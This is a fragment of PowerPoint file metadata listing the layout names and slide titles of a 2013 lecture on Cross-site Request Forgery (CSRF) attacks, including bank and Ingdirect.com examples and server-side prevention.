      <vt:lpstr>Photo - Horizontal Reflection</vt:lpstr>
      <vt:lpstr>Photo - Vertical</vt:lpstr>
      <vt:lpstr>Photo - Vertical Reflection</vt:lpstr>
      <vt:lpstr>Title - Top</vt:lpstr>
      <vt:lpstr>Blank</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets - Left</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets - 2 Column</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets - Right</vt:lpstr>
      <vt:lpstr>Title, Bullets &amp; Photo</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 1</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 2</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 3</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 4</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 5</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 6</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 7</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 8</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 9</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 10</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 11</vt:lpstr>
      <vt:lpstr>Title &amp; Bullets copy 12</vt:lpstr>
      <vt:lpstr>Blueprint</vt:lpstr>
      <vt:lpstr>1_Title &amp; Bullets copy</vt:lpstr>
      <vt:lpstr>2_Title &amp; Bullets copy</vt:lpstr>
      <vt:lpstr>4_Title &amp; Bullets copy</vt:lpstr>
      <vt:lpstr>Cross-site Request Forgery (CSRF) Attacks</vt:lpstr>
      <vt:lpstr>Today’s Lecture Cross-site Request Forgery (CSRF) Attacks</vt:lpstr>
      <vt:lpstr>What is CSRF and Why Should you Care?</vt:lpstr>
      <vt:lpstr>XSS vs. CSRF</vt:lpstr>
      <vt:lpstr>High-level View of How CSRF Works</vt:lpstr>
      <vt:lpstr>XSRF (aka CSRF): Summary</vt:lpstr>
      <vt:lpstr>XSS: Cross-Site Scripting</vt:lpstr>
      <vt:lpstr>CSRF Attack: Bank Example*</vt:lpstr>
      <vt:lpstr>CSRF Attack: Bank Example*</vt:lpstr>
      <vt:lpstr>CSRF Attack: Bank Example*</vt:lpstr>
      <vt:lpstr>CSRF: Bank Example</vt:lpstr>
      <vt:lpstr>What can we Learn from the  CSRF Bank Attack Example?</vt:lpstr>
      <vt:lpstr>Can the use of SSL prevent CSRF?</vt:lpstr>
      <vt:lpstr>POST request-based CSRF</vt:lpstr>
      <vt:lpstr>Another Example: GET and POST CSRF</vt:lpstr>
      <vt:lpstr>Ingdirect.com Attack: GET and POST CSRF</vt:lpstr>
      <vt:lpstr>Ingdirect.com Attack: GET and POST CSRF</vt:lpstr>
      <vt:lpstr>Preventing CSRF Server-side Protection</vt:lpstr>
      <vt:lpstr>Preventing CSRF Server-side Protection</vt:lpstr>
      <vt:lpstr>XSS vs. CSRF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Cross-site Request Forgery (CSRF) Attacks</dc:title>
  <dc:subject/>
  <dc:creator/>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Vijay Ganesh</cp:lastModifiedBy>
  <cp:revision>216</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-02-28T19:14:32Z</dcterms:modified>
</cp:coreProperties>
</file>